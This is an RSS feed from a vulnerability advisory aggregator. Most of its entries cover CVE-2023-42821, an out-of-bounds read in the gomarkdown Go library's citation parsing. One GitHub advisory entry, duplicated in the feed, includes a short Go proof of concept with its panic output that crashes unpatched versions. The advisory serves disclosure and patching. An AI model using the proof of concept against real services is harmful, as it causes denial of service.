<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sun, 04 Oct 2026 05:08:59 +0000</lastBuildDate>
    <item>
      <title>Withdrawn: CLEANSTART-2026-BR58082 — Echo is a Go web framework</title>
      <link>https://cve.radiocsirt.org/vuln/cleanstart-2026-br58082</link>
      <description>&lt;p&gt;&lt;strong&gt;Withdrawn by the publisher.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; CleanStart: kube-metrics-adapter&lt;/p&gt;
&lt;p&gt;Multiple security vulnerabilities affect the kube-metrics-adapter package. Echo is a Go web framework. See references for individual vulnerability details.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Withdrawn by the publisher.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; CleanStart: kube-metrics-adapter&lt;/p&gt;
&lt;p&gt;Multiple security vulnerabilities affect the kube-metrics-adapter package. Echo is a Go web framework. See references for individual vulnerability details.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/cleanstart-2026-br58082</guid>
    </item>
    <item>
      <title>EUVD-2026-187670</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-187670</link>
      <description>EUVD-2026-187670</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-187670</guid>
    </item>
    <item>
      <title>fkie_cve-2023-42821</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2023-42821</link>
      <description>&lt;p&gt;The package `github.com/gomarkdown/markdown` is a Go library for parsing Markdown text and rendering as HTML. Prior to pseudoversion `0.0.0-20230922105210-14b16010c2ee`, which corresponds with commit `14b16010c2ee7ff33a940a541d993bd043a88940`, parsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability. To exploit the vulnerability, parser needs to have `parser.Mmark` extension set. The panic occurs inside the `citation.go` file on the line 69 when the parser tries to access the element past its length. This can result in a denial of service. Commit `14b16010c2ee7ff33a940a541d993bd043a88940`/pseudoversion `0.0.0-20230922105210-14b16010c2ee` contains a patch for this issue.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;The package `github.com/gomarkdown/markdown` is a Go library for parsing Markdown text and rendering as HTML. Prior to pseudoversion `0.0.0-20230922105210-14b16010c2ee`, which corresponds with commit `14b16010c2ee7ff33a940a541d993bd043a88940`, parsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability. To exploit the vulnerability, parser needs to have `parser.Mmark` extension set. The panic occurs inside the `citation.go` file on the line 69 when the parser tries to access the element past its length. This can result in a denial of service. Commit `14b16010c2ee7ff33a940a541d993bd043a88940`/pseudoversion `0.0.0-20230922105210-14b16010c2ee` contains a patch for this issue.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2023-42821</guid>
    </item>
    <item>
      <title>GHSA-m9xq-6h2j-65r2 — Markdown vulnerable to Out-of-bounds Read while parsing citations</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-m9xq-6h2j-65r2</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/gomarkdown/markdown&lt;/p&gt;
&lt;p&gt;### Summary
Parsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability.&lt;/p&gt;
&lt;p&gt;### Details
To exploit the vulnerability, parser needs to have parser.Mmark extension set. The panic occurs inside the `citation.go` file on the line 69 when the parser tries to access the element past its length.&lt;/p&gt;
&lt;p&gt;https://github.com/gomarkdown/markdown/blob/7478c230c7cd3e7328803d89abe591d0b61c41e4/parser/citation.go#L69&lt;/p&gt;
&lt;p&gt;### PoC
```go
package main&lt;/p&gt;
&lt;p&gt;import (
	&amp;#34;github.com/gomarkdown/markdown&amp;#34;
	&amp;#34;github.com/gomarkdown/markdown/parser&amp;#34;
)&lt;/p&gt;
&lt;p&gt;func main() {
	ext := parser.CommonExtensions |
		parser.Attributes |
		parser.OrderedListStart |
		parser.SuperSubscript |
		parser.Mmark
	p := parser.NewWithExtensions(ext)&lt;/p&gt;
&lt;p&gt;inp := []byte(&amp;#34;[@]&amp;#34;)
	markdown.ToHTML(inp, p, nil)
}
```&lt;/p&gt;
&lt;p&gt;```bash
$ go run main.go
panic: runtime error: index out of range [1] with length 1&lt;/p&gt;
&lt;p&gt;goroutine 1 [running]:
github.com/gomarkdown/markdown/parser.citation(0x10?, {0x1400000e3f0, 0x14000141801?, 0x3}, 0x0?)
	/Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/parser/citation.go:69 +0x544
github.com/gomarkdown/markdown/parser.link(0x14000152000?, {0x1400000e3f0?, 0x3?, 0x3?}, 0x14000141ad8?)
	/Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/parser/inline.go:308 +0x1c0
github.com/gomarkdown/markdown/parser.(*Parser).Inline(0x14000152000, {0x102d87f48, 0x14000076180}, {0x1400000e3f0, 0x3, 0x3})
	/Users…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/gomarkdown/markdown&lt;/p&gt;
&lt;p&gt;### Summary
Parsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability.&lt;/p&gt;
&lt;p&gt;### Details
To exploit the vulnerability, parser needs to have parser.Mmark extension set. The panic occurs inside the `citation.go` file on the line 69 when the parser tries to access the element past its length.&lt;/p&gt;
&lt;p&gt;https://github.com/gomarkdown/markdown/blob/7478c230c7cd3e7328803d89abe591d0b61c41e4/parser/citation.go#L69&lt;/p&gt;
&lt;p&gt;### PoC
```go
package main&lt;/p&gt;
&lt;p&gt;import (
	&amp;#34;github.com/gomarkdown/markdown&amp;#34;
	&amp;#34;github.com/gomarkdown/markdown/parser&amp;#34;
)&lt;/p&gt;
&lt;p&gt;func main() {
	ext := parser.CommonExtensions |
		parser.Attributes |
		parser.OrderedListStart |
		parser.SuperSubscript |
		parser.Mmark
	p := parser.NewWithExtensions(ext)&lt;/p&gt;
&lt;p&gt;inp := []byte(&amp;#34;[@]&amp;#34;)
	markdown.ToHTML(inp, p, nil)
}
```&lt;/p&gt;
&lt;p&gt;```bash
$ go run main.go
panic: runtime error: index out of range [1] with length 1&lt;/p&gt;
&lt;p&gt;goroutine 1 [running]:
github.com/gomarkdown/markdown/parser.citation(0x10?, {0x1400000e3f0, 0x14000141801?, 0x3}, 0x0?)
	/Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/parser/citation.go:69 +0x544
github.com/gomarkdown/markdown/parser.link(0x14000152000?, {0x1400000e3f0?, 0x3?, 0x3?}, 0x14000141ad8?)
	/Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/parser/inline.go:308 +0x1c0
github.com/gomarkdown/markdown/parser.(*Parser).Inline(0x14000152000, {0x102d87f48, 0x14000076180}, {0x1400000e3f0, 0x3, 0x3})
	/Users…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-m9xq-6h2j-65r2</guid>
    </item>
    <item>
      <title>gsd-2023-42821</title>
      <link>https://cve.radiocsirt.org/vuln/gsd-2023-42821</link>
      <description>gsd-2023-42821</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/gsd-2023-42821</guid>
    </item>
    <item>
      <title>msrc_CVE-2023-42821 — github.com/gomarkdown/markdown Out-of-bounds Read while parsing citations</title>
      <link>https://cve.radiocsirt.org/vuln/msrc_cve-2023-42821</link>
      <description>msrc_CVE-2023-42821</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/msrc_cve-2023-42821</guid>
    </item>
    <item>
      <title>UBUNTU-CVE-2023-42821</title>
      <link>https://cve.radiocsirt.org/vuln/ubuntu-cve-2023-42821</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:24.04:LTS: golang-github-gomarkdown-markdown, Ubuntu:25.10: golang-github-gomarkdown-markdown, Ubuntu:26.04:LTS: golang-github-gomarkdown-markdown&lt;/p&gt;
&lt;p&gt;The package `github.com/gomarkdown/markdown` is a Go library for parsing Markdown text and rendering as HTML. Prior to pseudoversion `0.0.0-20230922105210-14b16010c2ee`, which corresponds with commit `14b16010c2ee7ff33a940a541d993bd043a88940`, parsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability. To exploit the vulnerability, parser needs to have `parser.Mmark` extension set. The panic occurs inside the `citation.go` file on the line 69 when the parser tries to access the element past its length. This can result in a denial of service. Commit `14b16010c2ee7ff33a940a541d993bd043a88940`/pseudoversion `0.0.0-20230922105210-14b16010c2ee` contains a patch for this issue.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:24.04:LTS: golang-github-gomarkdown-markdown, Ubuntu:25.10: golang-github-gomarkdown-markdown, Ubuntu:26.04:LTS: golang-github-gomarkdown-markdown&lt;/p&gt;
&lt;p&gt;The package `github.com/gomarkdown/markdown` is a Go library for parsing Markdown text and rendering as HTML. Prior to pseudoversion `0.0.0-20230922105210-14b16010c2ee`, which corresponds with commit `14b16010c2ee7ff33a940a541d993bd043a88940`, parsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability. To exploit the vulnerability, parser needs to have `parser.Mmark` extension set. The panic occurs inside the `citation.go` file on the line 69 when the parser tries to access the element past its length. This can result in a denial of service. Commit `14b16010c2ee7ff33a940a541d993bd043a88940`/pseudoversion `0.0.0-20230922105210-14b16010c2ee` contains a patch for this issue.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ubuntu-cve-2023-42821</guid>
    </item>
  </channel>
</rss>
